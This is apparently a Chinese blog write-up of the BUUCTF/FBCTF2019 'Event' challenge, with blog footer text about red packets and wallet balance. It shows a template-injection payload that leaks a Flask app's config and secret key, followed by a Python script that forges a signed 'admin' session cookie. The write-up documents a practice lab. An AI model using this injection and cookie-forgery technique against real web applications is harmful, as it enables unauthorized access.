BUUCTF--[FBCTF2019]Event

进入页面,注册登录

访问flag

 查看Cookie,这里很容易就猜到是要伪造Cookie

 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名.

 看大佬的wp知道
event_important参数存在模版注入,输入__dict__,发现成功回显
接着查找配置文件:__class__.__init__.__globals__[app].config

发现加密所需的密钥,伪造session

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

将所得到的session替换掉user内容,再次访问flag即可得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值